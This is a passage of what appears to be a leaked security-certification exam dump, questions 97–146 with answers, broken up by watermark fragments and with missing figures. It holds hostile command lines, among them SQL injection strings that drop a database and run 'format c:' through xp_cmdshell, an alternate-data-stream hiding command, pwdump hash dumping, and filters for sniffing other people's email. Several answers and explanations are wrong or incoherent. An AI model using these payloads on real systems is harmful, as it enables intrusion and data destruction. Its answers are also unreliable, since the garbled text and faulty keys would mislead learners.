could be a bad idea if there is an Intrusion Detection System deployed to monitor the traffic
between point A and B?
A. SSL will slow down the IDS while it is breaking the encryption to see the packet content
tua
B. SSL is redundant if you already have IDS's in place

C. SSL will mask the content of the packet and Intrusion Detection System are blinded
D. SSL will trigger rules at regular interval and force the administrator to turn them off
Ac
Answer: C
Explanation:
An IDS will not be able to evaluate the content in the packets if it is encrypted.
QUESTION NO: 98
Jacob would like your advice on using a wireless hacking tool that can save him time and get him
better results with lesser packets. You would like to recommend a tool that uses KoreK's
implementation. Which tool would you recommend from the list below?
A. Aircrack

B. Kismet
C. John the Ripper
D. Shmoo
Answer: A
QUESTION NO: 99
Bob is acknowledged as a hacker of repute and is popular among visitors of 'underground' sites.
Bob is willing to share his knowledge to those who are willing to learn, and many have expressed
their interest in learning from him.
However, this knowledge has risks associated with it, as the same knowledge can be used for
malevolent attacks as well. In this context, what would be the most effective method to bridge the
m
knowledge gap between the "black" hats or crackers and the "white" hats or computer security
professionals?
.co
A. Hire more computer security monitoring personnel to monitor computer systems and networks
B. Make obtaining either a computer security certification or accreditation easier to achieve so
sts
more individuals feel that they are a part of something larger than life
C. Train more national guard and reservist in the art of computer security to help out in times of
emergency or crises
lTe
D. Educate everyone with books, articles and training on risk analysis, vulnerabilities and
safeguards
tua
Answer: D
Explanation:
Bridging the gap would consist of educating the white hats and the black hats equally so that their
Ac
knowledge is relatively the same. Using books, articles, the internet, and professional training
seminars is a way of completing this goal.
QUESTION NO: 100
Clive has been monitoring his IDS and sees that there are a huge number of ICMP Echo Reply
packets that are being received on the external gateway interface. Further inspection reveals they
are not responses from internal hosts' requests but simply responses coming from the Internet.
What could be the likely cause of this?
A. Someone spoofed Clive's IP address while doing a smurf attack

B. Someone spoofed Clive's IP address while doing a land attack

C. Someone spoofed Clive's IP address while doing a DoS attack
D. Someone spoofed Clive's IP address while doing a fraggle attack
Answer: A
Explanation:
The smurf attack , named after its exploit program, is a denial-of-service attack that uses spoofed
broadcast ping messages to flood a target system. In such an attack, a perpetrator sends a large
amount of ICMP echo (ping) traffic to IP broadcast addresses, all of it having a spoofed source
address of the intended victim. If the routing device delivering traffic to those broadcast addresses
performs the IP broadcast to layer 2 broadcast function, most hosts on that IP network will take the
ICMP echo request and reply to it with an echo reply, multiplying the traffic by the number of hosts
responding. On a multi-access broadcast network, hundreds of machines might reply to each
packet.
m
QUESTION NO: 101
.co
_____ is found in all versions of NTFS and is described as the ability to fork file data into existing
files without affecting their functionality, size, or display to traditional file browsing utilities like dir or
sts
Windows Explorer
A. Merge Streams
lTe
B. Steganography
C. Alternate Data Streams
D. NetBIOS vulnerability
tua
Answer: C
Explanation:
Ac
ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to
hide information in alternate data streams in existing files. The file can have multiple data streams
and the data streams are accessed by filename:stream.
QUESTION NO: 102
Wardialing is one of the oldest methods of gaining unauthorized access to the targeted systems, it
is one of the dangers most commonly forgotten by network engineers and system administrators.
A hacker can sneak past all the expensive firewalls and IDS and connect easily into the network.
Through wardialing, an attacker searches for the devices located in the target network
infrastructure that are also accessible through the telephone line.
'Dial backup' in routers is most frequently found in networks where redundancy is required. Dial-

on-demand routing (DDR) is commonly used to establish connectivity as a backup.
As a security tester, how would you discover what telephone numbers to dial-in to the router?
A. Run a war-dialing tool with range of phone numbers and look for CONNECT response
B. Connect using ISP's remote-dial in number since the company's router has a leased line
connection established with them
C. Search the Internet for leakage of target company's telephone number to dial-in
D. Brute force the company's PABX system to retrieve the range of telephone numbers to dial-in
Answer: A
Explanation:
Use a program like Toneloc to scan the company's range of phone numbers.
m
QUESTION NO: 103
.co
Jim was having no luck performing a penetration test on his company's network. He was running
the test from home and had downloaded every security scanner he could lay his hands on.
Despite knowing the IP range of all of the systems, and the exact network configuration, Jim was
sts
unable to get any useful results. Why is Jim having these problems?
A. Security scanners are not designed to do testing through a firewall

lTe
B. Security scanners cannot perform vulnerability linkage

C. Security scanners are only as smart as their database and cannot find unpublished
vulnerabilities
tua
D. All of the above
Answer: D
Ac
Explanation:
The Security scanners available online are often to "outdated" to perform a live pentest against a
victim.
QUESTION NO: 104
You are concerned that someone running PortSentry could block your scans, and you decide to
slow your scans so that no one detects them. Which of the following command will help you
achieve this?
A. nmap -sO -PT -O -C5 <ip address>

B. nmap -sF -PT -PI -O <ip address>

C. nmap -sS -PT -PI -O -T1 <ip address>
D. nmap -sF -P0 -O <ip address>
Answer: C
Explanation:
-T[0-5]:Settimingtemplate(higherisfaster)
QUESTION NO: 105
While reviewing the results of a scan run against a target network you come across the following:
system.sysDescr.0 : DISPLAY STRING- (ascii): Cisco Internetwork Operating

ystem Software
OS (tm) 4500 Software (C4500-IS-M), Version 12.0(9), RELEASE SOFTWARE (fc1)
m
opyright (c) 1986-2000 by cisco Systems, Inc.
ompiled Tue 25-Jan-00 04:28 by bettyl
ystem.sysObjectID.0 : OBJECT IDENTIFIER:
.co
iso.org.dod.internet.private.enterprises.cisco.catProd.cisco4700
sts
ystem.sysUpTime.0 : Timeticks: (156398017) 18 days, 2:26:20.17
ystem.sysContact.0 : DISPLAY STRING- (ascii):
ystem.sysName.0 : DISPLAY STRING- (ascii): somerroutername
lTe
ystem.sysLocation.0 : DISPLAY STRING- (ascii):

ystem.sysServices.0 : INTEGER: 6
ystem.sysORLastChange.0 : Timeticks: (0) 0:00:00.00
tua
What was used to obtain this output?

Ac
A. An SNMP walk
B. Hping2 diagnosis
C. nmap protocol/port scan
D. A Bo2k system query
Answer: A
Explanation:
The snmpwalk command is designed to perform a sequence of chained GETNEXT requests
automatically, rather than having to issue the necessary snmpgetnext requests by hand. The
command takes a single OID, and will display a list of all the results which lie within the subtree
rooted on this OID.

QUESTION NO: 106
Why would an attacker want to perform a scan on port 137?
A. To disrupt the NetBIOS SMB service on the target host

B. To discover proxy servers on a network
C. To check for file and print sharing on Windows systems
D. To discover information about a target host using NBTSTAT
Answer: D
Explanation:
Microsoft encapsulates netbios information within
TCP/Ip using ports 135-139. It is trivial for an attacker to issue the
following command:
m
nbtstat -A (your Ip address)
.co
from their windows machine and collect information about your windows
machine (if you are not blocking traffic to port 137 at your borders).
sts
QUESTION NO: 107

lTe
On a backdoored Linux box there is a possibility that legitimate programs are modified or trojaned.
How is it possible to list processes and uids associated with them in a more reliable manner?
tua
A. Use "ps"
B. Use "netstat"
C. Use "lsof"
Ac
D. Use "echo"
Answer: C
Explanation:
lsof is a command used in many Unix-like systems that is used to report a list of all open files and
the processes that opened them. It works in and supports several UNIX flavors.
QUESTION NO: 108
You are the IT manager of a large legal firm in California. Your firm represents many important
clients whose names always must remain anonymous to the public. Your boss, Mr. Smith, is
always concerned about client information being leaked or revealed to the press or public. You
have just finished a complete security overhaul of your information systems including an updated

IPS, new firewalls, email encryption, and employee security awareness training. Unfortunately,
many of your firm's clients do not trust technology to completely secure their information, so
couriers routinely have to travel back and forth, to and from the office with sensitive information.
Your boss has charged you with figuring out how to secure the information the couriers must
transport. You propose that the data be transferred using burned CD's or USB flash drives. You
initially think of encrypting the files, but decide against that method for fear the encryption keys
could eventually be broken.?
What software application could you use to hide the data on the CD's and USB flash drives?
A. File snuff
B. Snow
C. EFS
D. File sneaker
m
Answer: B
Explanation:
.co
The Snow software developed by Matthew Kwan will insert extra spaces at the end of each line.
sts
Three bits are encoded in each line by adding between 0 and 7 spaces that are ignored by most
display programs including web browsers.
lTe
QUESTION NO: 109

tua
SNMP is a connectionless protocol that uses UDP instead of TCP packets (True or False)
A. True
B. False
Ac
Answer: A
Explanation:
TCP and UDP provide transport services. But UDP was preferred. This is due to TCP
characteristics, it is a complicate protocol and it consume to many memory and CPU resources.
Where as UDP is easy to build and run. Into devices (repeaters and modems) vendors have built
simple version of IP and UDP.
QUESTION NO: 110
Steven, a security analyst for XYZ associates, is analyzing packets captured by Ethereal on a
Linux server inside his network when the server starts to slow down tremendously. Steven
examines the following Ethereal capture:
m
.co
A. SYN flood
sts
B. ARP spoofing
C. Smurf attack
D. Ping of Death
lTe
Answer: C
Explanation:
tua
A perpetrator is sending a large amount of ICMP echo (ping) traffic to IP broadcast addresses, all
of it having a spoofed source address of the intended victim. If the routing device delivering traffic
to those broadcast addresses performs the IP broadcast to layer 2 broadcast function, most hosts
Ac
on that IP network will take the ICMP echo request and reply to it with an echo reply, multiplying
the traffic by the number of hosts responding.
QUESTION NO: 111
You are performing a port scan with nmap. You are in hurry and conducting the scans at the
fastest possible speed. However, you don't want to sacrifice reliability for speed. If stealth is not an
issue, what type of scan should you run to get very reliable results?
A. Stealth scan
B. Fragmented packet scan
C. Connect scan

D. XMAS scan
Answer: C
Explanation:
A TCP Connect scan, named after the Unix connect() system call is the most accurate scanning
method. If a port is open the operating system completes the TCP three-way handshake, and the
port scanner immediately closes the connection.
QUESTION NO: 112
Bryan notices the error on the web page and asks Liza to enter liza' or '1'='1 in the email field.
They are greeted with a message "Your login information has been mailed to
johndoe@gmail.com". What do you think has occurred?
m
A. The web application picked up a record at random
B. The web application emailed the administrator about the error
.co
C. The server error has caused the application to malfunction
D. The web application returned the first record it found
sts
Answer: D
Explanation:
lTe
The web application sends a query to an SQL database and by giving it the criteria 1=1, which
always will be true, it will return the first value it finds.
tua
QUESTION NO: 113

Ac
What file system vulnerability does the following command take advantage of?
type c:\anyfile.exe > c:\winnt\system32\calc.exe:anyfile.exe
A. Backdoor access
B. ADS
C. NTFS
D. HFS
Answer: B
Explanation:
ADS (or Alternate Data Streams) is a "feature" in the NTFS file system that makes it possible to
hide information in alternate data streams in existing files. The file can have multiple data streams
and the data streams are accessed by filename:stream.

QUESTION NO: 114
Michael is the security administrator for the ABC company.?Michael has been charged with
strengthening the company's security policies, including its password policies.Due to certain
legacy applications, Michael was only able to enforce a password group policy in Active Directory
with a minimum of 10 characters.He has informed the company's employees, however, that the
new password policy requires that everyone must have complex passwords with at least 14
characters.Michael wants to ensure that everyone is using complex passwords that meet the new
security policy requirements.Michael has just logged on to one of the network's domain controllers
and is about to run the following command.
What will this command accomplish?
m
.co
sts
lTe
tua
A. Dumps Active Directory password hashes to pwd.txt

B. Internet Cache file is piped to pwd.txt
Ac
C. Password history file is piped to pwd.txt

D. Dumps SAM password hashes to pwd.txt
Answer: D
Explanation:
Pwdump is a hack tool that is used to grab Windows password hashes from a remote Windows
computer. Pwdump > pwd.txt will redirect the output from pwdump to a text file named pwd.txt
QUESTION NO: 115
June, a security analyst, understands that a polymorphic virus has the ability to mutate and can
change its known viral signature and hide from signature-based antivirus programs. Can June use
an antivirus program in this case and would it be effective against a polymorphic virus?
A. Yes. June can use an antivirus program since it compares the signatures of executable files to
the database of known viral signatures and it is very effective against a polymorphic virus
B. No. June can't use an antivirus program since it compares the signatures of executable files to
the database of known viral signatures and in the case the polymorphic viruses cannot be
detected by a signature-based anti-virus program
C. No. June can't use an antivirus program since it compares the size of executable files to the
database of known viral signatures and it is effective on a polymorphic virus
D. Yes. June can use an antivirus program since it compares the parity bit of executable files to
the database of known check sum counts and it is effective on a polymorphic virus
Answer: B
Explanation:
Although there are functions like heuristic scanning and sandbox technology, the Antivirus
program is still mainly depending of signature databases and can only find already known viruses.
m
QUESTION NO: 116 .co
Which tool/utility can help you extract the application layer data from each TCP connection from a
sts
log file into separate files?
A. argus
lTe
B. Tcpdump
C. TCPflow
D. Snort
tua
Answer: C
Explanation:
Ac
Tcpflow is a program that captures data transmitted as part of TCP connections (flows), and stores
the data in a way that is convenient for protocol analysis or debugging. A program like 'tcpdump'
shows a summary of packets seen on the wire, but usually doesn't store the data that's actually
being transmitted. In contrast, tcpflow reconstructs the actual data streams and stores each flow in
a separate file for later analysis.
QUESTION NO: 117
Attackers can potentially intercept and modify unsigned SMB packets, modify the traffic and
forward it so that the server might perform undesirable actions. Alternatively, the attacker could
pose as the server or client after a legitimate authentication and gain unauthorized access to data.
Which of the following is NOT a means that can be used to minimize or protect against such an
attack?

A. Timestamps
B. File permissions
C. SMB Signing
D. Sequence numbers monitoring
Answer: A,C,D
QUESTION NO: 118
Bill has successfully executed a buffer overflow against a Windows IIS web server. He has been
able to spawn an interactive shell and plans to deface the main web page. He first attempts to use
the "Echo" command to simply overwrite index.html and remains unsuccessful. He then attempts
to delete the page and achieves no progress. Finally, he tries to overwrite it with another page in
which also he remains unsuccessful. What is the probable cause of Bill's problem?
m
A. You cannot use a buffer overflow to deface a web page
B. The system is a honeypot
C. The HTML file has permissions of read only
.co
D. There is a problem with the shell and he needs to run the attack again
sts
Answer: C
lTe
QUESTION NO: 119
More sophisticated IDSs look for common shellcode signatures. But even these systems can be
tua
bypassed, by using polymorphic shellcode. This is a technique common among virus writers it
basically hides the true nature of the shellcode in different disguises.
Ac
How does a polymorphic shellcode work?
A. They compress shellcode into normal instructions, uncompress the shellcode using loader code
and then executing the shellcode
B. They reverse the working instructions into opposite order by masking the IDS signatures
C. They convert the shellcode into Unicode, using loader to convert back to machine code then
executing them
D. They encrypt the shellcode by XORing values over the shellcode, using loader code to decrypt
the shellcode, and then executing the decrypted shellcode
Answer: D

QUESTION NO: 120
Blake is in charge of securing all 20 of his company's servers. He has enabled hardware and
software firewalls, hardened the operating systems, and disabled all unnecessary services on all
the servers. Unfortunately, there is proprietary AS400 emulation software that must run on one of
the servers that requires the telnet service to function properly. Blake is especially concerned
about this since telnet can be a very large security risk in an organization. Blake is concerned
about how this particular server might look to an outside attacker so he decides to perform some
footprinting, scanning, and penetration tests on the server.Blake telnets into the server and types
in the following command:
HEAD / HTTP/1.0
After pressing enter twice, Blake gets the following results:
m
What has Blake just accomplished?
.co
sts
lTe
tua
Ac
A. Downloaded a file to his local computer

B. Grabbed the banner
C. Submitted a remote command to crash the server
D. Poisoned the local DNS cache of the server
Answer: B
QUESTION NO: 121
You are sniffing an unprotected WiFI network located in a JonDonalds Cybercafe with Ethereal to
capture hotmail e-mail traffic. You see lots of people using their laptops browsing the web while
sipping brewed coffee from JonDonalds. You want to sniff their e-mail messages traversing the
unprotected WiFi network.

Which of the following ethereal filters will you configure to display only the packets with hotmail e-
mail messages?
A. (http contains "e-mail") && (http contains "hotmail")

B. (http = "login.passport.com") && (http contains "SMTP")
C. (http contains "hotmail") && (http contains "Reply-To")
D. (http = "login.passport.com") && (http contains "POP3")
Answer: C
Explanation:
Each Hotmail message contains the tag Reply-To:<sender address> and "xxxx-xxx-
xxx.xxxx.hotmail.com" in the received tag.
QUESTION NO: 122
m
Annie has just succeeded in stealing a secure cookie via a XSS attack. She is able to replay the
.co
cookie even while the session is valid on the server. Why do you think this is possible?
A. It works because encryption is performed at the application layer (single encryption key)
sts
B. It works because encryption is performed at the network layer (layer 1 encryption)
C. Any cookie can be replayed irrespective of the session status
D. The scenario is invalid as a secure cookie cannot be replayed
lTe
Answer: A
tua
Explanation:
Single key encryption (conventional cryptography) uses a single word or phrase as the key. The
same key is used by the sender to encrypt and the receiver to decrypt. Sender and receiver
initially need to have a secure way of passing the key from one to the other. With TLS or SSL this
Ac
would not be possible.
QUESTION NO: 123
John has a proxy server on his network which caches and filters web access. He shuts down all
unnecessary ports and services. Additionally, he has installed a firewall (Cisco PIX) that will not
allow users to connect to any outbound ports. Jack, a network user has successfully connected to
a remote server on port 80 using netcat. He could in turn drop a shell from the remote machine.
Assuming an attacker wants to penetrate John's network, which of the following options is he likely
to choose?
A. Use HTTPTunnel or Stunnel on port 80 and 443

B. Use reverse shell using FTP protocol
C. Use Monkey shell
D. Use ClosedVPN
Answer: A
Explanation:
As long as you allow http or https traffic attacks can be tunneled over those protocols with Stunnel
or HTTPTunnel.
QUESTION NO: 124
One of the most common and the best way of cracking RSA encryption is to begin to derive the
two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p
and q are discovered through a _____________ process, then the private key can be derived.
m
A. Hashing
B. Factorization
.co
C. Prime detection
D. Brute-forcing
sts
Answer: B
lTe
Explanation:
In April 1994, an international cooperative group of mathematicians and computer scientists
solved a 17-year-old challenge problem, the factoring of a 129-digit number, called RSA-129, into
tua
two primes. That is, RSA-129 = 1143816257578888676692357799761466120102182

9672124236256256184293570693524573389783059
7123563958705058989075147599290026879543541
Ac
= 34905295108476509491478496199038 98133417764638493387843990820577 times

32769132993266709549961988190834 461413177642967992942539798288533.
Se more at http://en.wikipedia.org/wiki/RSA_Factoring_Challenge
QUESTION NO: 125
Microsoft Authenticode technology is used for:
A. Digitally signing Javascript files

B. Digitally signing Java Applets
C. Digitally signing SSL certificates
D. Digitally signing ActiveX controls

Answer: D
Explanation:
Authenticode identifies the publisher of signed software and verifies that it hasn't been tampered
with, before users download software to their PCs. As a result, end users can make a more
informed decision as to whether or not to download code. Authenticode relies on digital certificates
and is based on specifications that have been used successfully in the industry for some time,
including Public Key Cryptography Standards (PKCS) #7 (encrypted key specification), PKCS #10
(certificate request formats), X.509 (certificate specification), and Secure Hash Algorithm (SHA)
and MD5 hash algorithms.
QUESTION NO: 126
What port number is used by LDAP protocol?
m
A. 464
B. 389
C. 110
.co
D. 445
sts
Answer: B
Explanation:
lTe
Active Directory and Exchange use LDAP via TCP port 389 for clients.
tua
QUESTION NO: 127
You are conducting pen-test against a company's website using SQL Injection techniques. You
Ac
enter "anything' or 1=1 " in the username field of an authentication form. This is the output
returned from the server.
What is the next step to be done?

m
.co
A. Identify the user context of the web application by running:
sts
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND USER_NAME() = 'dbo'
B. Reboot the web server by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset -
lTe
reboot'; --
C. Delete the database and format the C: drive by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND drop database myDB;
tua
xp_cmdshell 'format c: /q /yes '; --

D. Identify the database and table name by running:
http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND
Ac
ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'),1))) > 109
Answer: A
QUESTION NO: 128
Melissa is a virus that targeted Microsoft Windows platforms. To which category does this virus
belong?
A. Polymorphic
B. System
C. Boot Sector infector
D. Macro

Answer: D
Explanation:
The Melissa macro virus propagates in the form of an email message containing an infected Word
document as an attachment.
QUESTION NO: 129
Eric notices repeated probes to port 1080. He learns that the protocol being used is designed to
allow a host outside of a firewall to connect transparently and securely through the firewall. He
wonders if his firewall has been breached. What would be your inference?
A. The attacker is using the ICMP protocol to have a covert channel

B. Eric has a Wingate package providing FTP redirection on his network
C. Somebody is using SOCKS on the network to communicate through the firewall
m
D. Eric's network has been penetrated by a firewall breach
Answer: C
.co
Explanation:
sts
QUESTION NO: 130

lTe
Barney is looking for a Windows NT/2000/XP command-line tool that can be used to assign,
display, or modify ACLs (access control lists) to files or folders and that could also be used within
tua
batch files. Which of the following tools could be used for this purpose?
A. NTPERM.exe
Ac
B. PERM.exe
C. CACLS.exe
D. CLACS.exe
Answer: C
Explanation:
Cacls.exe (Change Access Control Lists) is an executable in Microsoft Windows to change
Access Control List (ACL) permissions on a directory, its subcontents, or files. An access control
list is a list of permissions for a file or directory that controls who can access it.
QUESTION NO: 131

What hacking attack is challenge/response authentication used to prevent?
A. Scanning attacks
B. Password cracking attacks
C. Replay attacks
D. Session hijacking attacks
Answer: C
Explanation:
A replay attack is a form of network attack in which a valid data transmission is maliciously or
fraudulently repeated or delayed. This is carried out either by the originator or by an adversary
who intercepts the data and retransmits it. With a challenge/response authentication you ensure
that captured packets can't be retransmitted without a new authentication.
m
QUESTION NO: 132
.co
StackGuard (as used by Immunix), ssp/ProPolice (as used by OpenBSD), and Microsoft's /GS
option use _____ defense against buffer overflow attacks.
sts
A. Format checking
B. Hex editing
C. Non-executing stack
lTe
D. Canary
Answer: D
tua
Explanation:
Canaries or canary words are known values that are placed between a buffer and control data on
the stack to monitor buffer overflows. When the buffer overflows, it will clobber the canary, making
Ac
the overflow evident. This is a reference to the historic practice of using canaries in coal mines,
since they would be affected by toxic gases earlier than the miners, thus providing a biological
warning system.
QUESTION NO: 133
Kevin has been asked to write a short program to gather user input for a web application. He likes
to keep his code neat and simple. His chooses to use printf(str) where he should have ideally used
printf("%s", str). What attack will his program expose the web application to?
A. Format String Attack

B. Unicode Traversal Attack

C. SQL injection Attack
Answer: A
Explanation:
Format string attacks are a new class of software vulnerability discovered around 1999,
previously thought harmless. Format string attacks can be used to crash a program or to execute
harmful code. The problem stems from the use of unfiltered user input as the format string
parameter in certain C functions that perform formatting, such as printf() . A malicious user may
use the %s and %x format tokens, among others, to print data from the stack or possibly other
locations in memory. One may also write arbitrary data to arbitrary locations using the %n format
token, which commands printf() and similar functions to write back the number of bytes formatted
to the same argument to printf() , assuming that the corresponding argument exists, and is of type
int *.
m
You have successfully run a buffer overflow attack against a default IIS installation running on a
sts
Windows 2000 server. The server allows you to spawn a shell. In order to perform the actions you
intend to do, you need elevated permissions. You need to know what your privileges are within the
shell. What are your current privileges?
lTe
A. Administrator
B. IIS default installation account
tua
C. IUSR_COMPUTERNAME
D. LocalSystem
Answer: D
Ac
Explanation:
If you manage to get the system to start a shell for you, that shell will be running as
LOCAL_SYSTEM.
QUESTION NO: 135
What are the differences between SSL and S-HTTP?
A. SSL operates at the transport layer and S-HTTP operates at the application layer
B. SSL operates at the application layer and S-HTTP operates at the network layer
C. SSL operates at the application layer and S-HTTP operates at the transport layer
D. SSL operates at the network layer and S-HTTP operates at the application layer

Answer: A
Explanation:
The main difference between the protocols is the layer at which they operate. SSL operates at the
transport layer and mimics the "socket library," while S-HTTP operates at the application layer.
Encryption of the transport layer allows SSL to be application-independent, while S-HTTP is
limited to the specific software implementing it. The protocols adopt different philosophies towards
encryption as well, with SSL encrypting the entire communications channel and S-HTTP
encrypting each message independently.
QUESTION NO: 136
Dave has been assigned to test the network security of Acme Corp. The test was announced to
the employees. He created a webpage to discuss the progress of the tests with employees who
m
were interested in following the test. Visitors were allowed to click on a sand clock to mark the
progress of the test. Dave successfully embeds a keylogger. He also added some statistics on the
.co
webpage. The firewall protects the network well and allows strict Internet access. How was
security compromised and how did the firewall respond?
sts
A. The attack was deception and security was not directly compromised
B. Security was not compromised as the webpage was hosted internally
C. The attack was social engineering and the firewall did not detect it
lTe
D. The attack did not fall through as the firewall blocked the traffic
Answer: C
tua
Explanation:
This was just another way to trick the information out of the users without the need to hack into
any systems. All traffic is outgoing and initiated by the user so the firewall will not react.
Ac
QUESTION NO: 137
_____ ensures that the enforcement of organizational security policy does not rely on voluntary
web application user compliance. It secures information by assigning sensitivity labels on
information and comparing this to the level of security a user is operating at.
A. Discretionary Access Control

B. Role-based Access Control
C. Mandatory Access Control
D. Authorized Access Control
Answer: C

Explanation:
: In computer security, mandatory access control (MAC) is a kind of access control, defined by the
TCSEC as "a means of restricting access to objects based on the sensitivity (as represented by a
label) of the information contained in the objects and the formal authorization (i.e., clearance) of
subjects to access information of such sensitivity."
QUESTION NO: 138
Study the snort rule given:
alert tcp $EXTERNAL_NET any -> $HOME_NET 135 (msg:"NETBIOS DCERPC ISystemActivator
bind attempt"; flow:to_server,established; content:"|05|"; distance:0; within:1; content:"|0b|";
distance:1; within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00
00 00 46|"; distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin;
m
sid:2192; rev:1;)
.co
alert tcp $EXTERNAL_NET any -> $HOME_NET 445 (msg:"NETBIOS SMB DCERPC
ISystemActivator bind attempt"; flow:to_server,established; content:"|FF|SMB|25|"; nocase;
offset:4; depth:5; content:"|26 00|"; distance:56; within:2; content:"|5c 00|P|00|I|00|P|00|E|00 5c
sts
00|"; nocase; distance:5; within:12; content:"|05|"; distance:0; within:1; content:"|0b|"; distance:1;

within:1; byte_test:1,&,1,0,relative; content:"|A0 01 00 00 00 00 00 00 C0 00 00 00 00 00 00 46|";
lTe
distance:29; within:16; reference:cve,CAN-2003-0352; classtype:attempted-admin; sid:2193;

rev:1;)
tua
From the options below, choose the exploit against which this rule applies?
A. IIS Unicode
B. SQL Slammer
Ac
C. MS Blaster
D. WebDav
Answer: C
Explanation:
MS Blaster scans the Internet for computers that are vulnerable to its attack. Once found, it tries to
enter the system through the port 135 to create a buffer overflow. TCP ports 139 and 445 may
also provide attack vectors.
QUESTION NO: 139
You have chosen a 22 character word from the dictionary as your password. How long will it take
to crack the password by an attacker?
A. 5 minutes
B. 16 million years
C. 200 years
D. 23 days
Answer: A
Explanation:
A dictionary password cracker simply takes a list of dictionary words, and one at a time encrypts
them to see if they encrypt to the one way hash from the system. If the hashes are equal, the
password is considered cracked, and the word tried from the dictionary list is the password. As
long as you use a word found in or similar to a word found in a dictionary the password is
considered to be weak.
m
QUESTION NO: 140
.co
Bob has set up three web servers on Windows Server 2003 IIS 6.0. Bob has followed all the
recommendations for securing the operating system and IIS. These servers are going to run
numerous e-commerce websites that are projected to bring in thousands of dollars a day. Bob is
sts
still concerned about the security of these servers because of the potential for financial loss. Bob
has asked his company's firewall administrator to set the firewall to inspect all incoming traffic on
ports 80 and 443 to ensure that no malicious data is getting into the network.
lTe
Why will this not be possible?

tua
A. Firewalls cannot inspect traffic at all, they can only block or allow certain ports
B. Firewalls cannot inspect traffic coming through port 80
C. Firewalls cannot inspect traffic coming through port 443
D. Firewalls can only inspect outbound traffic
Ac
Answer: A
Explanation:
In order to really inspect traffic and traffic patterns you need an IDS.
QUESTION NO: 141
Which of the following is a patch management utility that scans one or more computers on your
network and alerts you if any important Microsoft security patches are missing. It then provides
links that enable those missing patches to be downloaded and installed.
A. MBSA

B. ASNB
C. PMUS
D. BSSA
Answer: A
Explanation:
The Microsoft Baseline Security Analyzer ( MBSA ) is a tool put out by Microsoft to help analyze
security problems in Microsoft Windows. It does this by scanning the system for security problems
in Windows, Windows components such as the IIS web server application, Microsoft SQL Server,
and Microsoft Office. One example of an issue might be that permissions for one of the directories
in the wwwroot folder of IIS could be set at too low a level, allowing unwanted modification of files
from outsiders.
m
QUESTION NO: 142
.co
The network administrator at Spears Technology, Inc has configured the default gateway Cisco
router's access-list as below:
sts
Current configuration : 1206 bytes
!
version 12.3
lTe
!
hostname Victim
!
tua
enable secret 5 $1$h2iz$DHYpcqURF0APD2aDuA.YX0

!
interface Ethernet0/0
Ac
p address dhcp
p nat outside
alf-duplex
!
interface Ethernet0/1
p address 192.168.1.1 255.255.255.0

p nat inside
alf-duplex
!
router rip
etwork 192.168.1.0
!
ip nat inside source list 102 interface Ethernet0/0 overload

no ip http server
ip classless
!
access-list 1 permit 192.168.1.0 0.0.0.255
access-list 102 permit ip any any
!
snmp-server community public RO
snmp-server community private RW 1
snmp-server enable traps tty
!
line con 0
ogging synchronous
ogin
line aux 0
line vty 0 4
m
assword secret
ogin
!
.co
!
sts
end
lTe
You are hired to conduct security testing on their network. You successfully brute-force the SNMP
community string using a SNMP crack tool. The access-list configured at the router prevents you
from establishing a successful connection.
tua
You want to retrieve the Cisco configuration from the router. How would you proceed?
A. Run a network sniffer and capture the returned traffic with the configuration file from the router
Ac
B. Use the Cisco's TFTP default password to connect and download the configuration file
C. Send a customized SNMP set request with a spoofed source IP address in the range -
192.168.1.0
D. Run Generic Routing Encapsulation (GRE) tunneling protocol from your computer to the router
masking your IP address
Answer: A,C
Explanation:
SNMP is allowed only by access-list 1. Therefore you need to spoof a 192.168.1.0/24 address and
then sniff the reply from the gateway.

QUESTION NO: 143
Why do you need to capture five to ten million packets in order to crack WEP with AirSnort?
A. All IVs are vulnerable to attack

B. Air Snort uses a cache of packets
C. Air Snort implements the FMS attack and only encrypted packets are counted
D. A majority of weak IVs transmitted by access points and wireless cards are not filtered by
contemporary wireless manufacturers
Answer: C
Explanation:
Since the summer of 2001, WEP cracking has been a trivial but time consuming process. A few
tools, AirSnort perhaps the most famous, that implement the Fluhrer-Mantin-Shamir (FMS) attack
were released to the security community -- who until then were aware of the problems with WEP
m
but did not have practical penetration testing tools. Although simple to use, these tools require a
very large number of packets to be gathered before being able to crack a WEP key. The AirSnort
.co
web site estimates the total number of packets at five to ten million, but the number actually
required may be higher than you think.
sts
QUESTION NO: 144

lTe
Bob is conducting a password assessment for one of his clients. Bob suspects that password
policies are not in place and weak passwords are probably the norm throughout the company he is
evaluating. Bob is familiar with password weaknesses and key loggers. What are the means that
tua
Bob can use to get password from his client hosts and servers?
A. Passwords are always best obtained using Hardware key loggers

Ac
B. Hardware and Software Keyloggers

C. Software only, they are the most effective
D. Hardware, Software, and Sniffing
Answer: D
Explanation:
All loggers will work as long as he has physical access to the computers.
QUESTION NO: 145
You just purchased the latest DELL computer, which comes pre-installed with Windows XP,
McAfee antivirus software and a host of other applications. You want to connect Ethernet wire to
your cable modem and start using the computer immediately.

Windows is dangerously insecure when unpacked from the box, and there are a few things that
you must do before you use it.
A. Install the latest signatures for Antivirus software

B. Configure "Windows Update" to automatic
C. Create a non-admin user with a complex password and logon to this account
D. Enable "guest" account
E. Install a personal firewall and lock down unused ports from connecting to your computer
F. New installation of Windows should be patched by installing the latest service packs and
hotfixes
G. You can start using your computer since the vendor such as DELL, HP and IBM already would
have installed the latest service packs up-to-date
Answer: A,B,C,E,F
m
Explanation:
The guest account is a possible vulnerability to your system so you should not enable it unless
.co
needed. Otherwise you should perform all other actions mentioned in order to have a secure
system.
sts
QUESTION NO: 146

lTe
Study the log below and identify the scan type.

tua
tcpdump -vv host 192.168.1.10

17:34:45.802163 eth0 < 192.168.1.1 > victim: ip-proto-117 0 (ttl 48, id 36166)
Ac
tcpdump -vv -x host 192.168.1.10

17:35:06.731739 eth0 < 192.168.1.10 > victim: ip-proto-130 0 (ttl 59, id 42060) 4500 0014 a44c
0000 3b82 57b8 c0a8 010a c0a8 0109 0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
0000 0000 0000
A. nmap S 192.168.1.10
